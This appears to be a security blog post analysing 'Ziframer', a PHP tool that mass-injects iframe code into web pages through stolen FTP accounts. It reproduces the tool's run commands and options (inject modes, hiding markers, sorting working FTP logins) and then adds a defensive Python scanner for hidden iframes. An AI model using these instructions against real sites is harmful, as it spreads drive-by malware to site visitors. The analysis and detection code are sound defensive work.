[*] The names of files, to insert the code can be set regExp’om, such as index \ .(.*)[_ b] or [_b ](.*). php | html | asp | htm.
[*] It takes on all the folders on the site.
[*] Function update replaces your old code to the new (for example, changed the addresses fryma)
[Run]
[!] Recommend to use the console interface
Windows: Open a console (Start-> Run-> cmd) Write to the path to php.exe for example c: \ php \ php.exe then write the path to the script (zifr.php) For example the so-c: \ php \ php.exe D: \ soft \ ziframer \ zifr.php the script will run and display a certificate.
* NIX: Open the console / ssh Write to php then write the path to the script (zifr.php) For example the so-php / home / user / soft / ziframer / zifr.php the script will run and display a certificate.
[Options]
-file -f Path to the file to your FTP
-code -c path to a file with code introduced
-inject -i Where vstavlt code three options start – top of the page end – in the bottom of the page change – replace the text in the page code
-time -t Timeout for connecting to the FTP
-del -d With this option chyuzhye ifremy komentiruyutsya
-update -u Update your code with this option, the script ishet inserted your code and replaces it with a new
-good -g file where badat skladyvatsya working FTP
-bad -b file where badat skladyvatsya not working FTP
-hide -h If you enable this option, your code will not markerovatsya but you will not be able to use the function update
-restore -r Continue from the last FTP if you had not had time to do the whole list you can start from where you stopped
Conclusion: The Ziframer script is very simple and cheap. Even a n00b is able to use it.
It also demonstrates how efficiently and easily cybercriminals can distribute their malicious code to tremendous numbers of stolen FTP accounts. Automated mechanisms like this one show how infection vectors are shifting more and more from e-mails with malicious attachments to Drive-by. The modular approach allows the cybercriminal to feed the script with different lists of compromised accounts that can be acquired on the underground market. Download Source fuckav.ru
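The post above describes a tool that appends, prepends or replaces content in html/php/asp files over FTP. As an added example (not from the post or the tool), here is a small defender-side audit in Python: it keeps a SHA-256 manifest of the targeted file types, flags any file whose hash has changed since the baseline (which catches the "start", "end" and "change" modes alike), and additionally scans each file for the hidden or 1x1 iframe and the tag-after-</html> patterns typical of such injections. File paths, contents and helper names are constructed for the demonstration.

```python
from __future__ import annotations
import hashlib
import re

# File types the Iframer targets according to its readme (html, php, asp).
TARGET_EXT = re.compile(r"\.(html?|php|asp)$", re.IGNORECASE)

# Signs of an injected drive-by frame: a 0/1-pixel or hidden iframe, or an
# iframe/script tag that sits after the document's closing </html> tag
# (the "end" injection mode simply appends to the file).
HIDDEN_FRAME = re.compile(
    r"<iframe[^>]*(width\s*=\s*[\"']?[01][\"']?|height\s*=\s*[\"']?[01][\"']?"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>",
    re.IGNORECASE,
)
AFTER_HTML = re.compile(r"</html>.*?<(iframe|script)\b", re.IGNORECASE | re.DOTALL)

# Constructed sample pages: a clean page and the same page with an appended hidden iframe.
SAMPLE_CLEAN = "<html><body><h1>Shop</h1></body></html>\n"
SAMPLE_INJECTED = SAMPLE_CLEAN + (
    '<iframe src="http://example.invalid/x.php" width="1" height="1" '
    'style="visibility:hidden"></iframe>'
)


def find_injection(content: str) -> list[str]:
    """Return the injection indicators found in one page (empty list if none)."""
    reasons = []
    if HIDDEN_FRAME.search(content):
        reasons.append("hidden or 1x1 iframe")
    if AFTER_HTML.search(content):
        reasons.append("iframe/script after closing </html>")
    return reasons


def fingerprint(files: dict[str, str]) -> dict[str, str]:
    """Build a baseline manifest: path -> SHA-256 of content, for targeted file types only."""
    return {p: hashlib.sha256(c.encode()).hexdigest()
            for p, c in files.items() if TARGET_EXT.search(p)}


def audit(manifest: dict[str, str], files: dict[str, str]) -> dict[str, list[str]]:
    """Compare the current files against the manifest and scan for injection patterns."""
    findings: dict[str, list[str]] = {}
    for path, digest in fingerprint(files).items():
        reasons = find_injection(files[path])
        if manifest.get(path) != digest:       # new file or changed since baseline
            reasons.insert(0, "hash differs from baseline")
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    baseline = fingerprint({"index.html": SAMPLE_CLEAN})
    print(audit(baseline, {"index.html": SAMPLE_INJECTED}))
```

The pattern scan is a triage aid and will also flag legitimate tracking pixels, so treat its hits as leads to inspect by hand; the hash comparison is the authoritative check and only works if the manifest is stored off the web host.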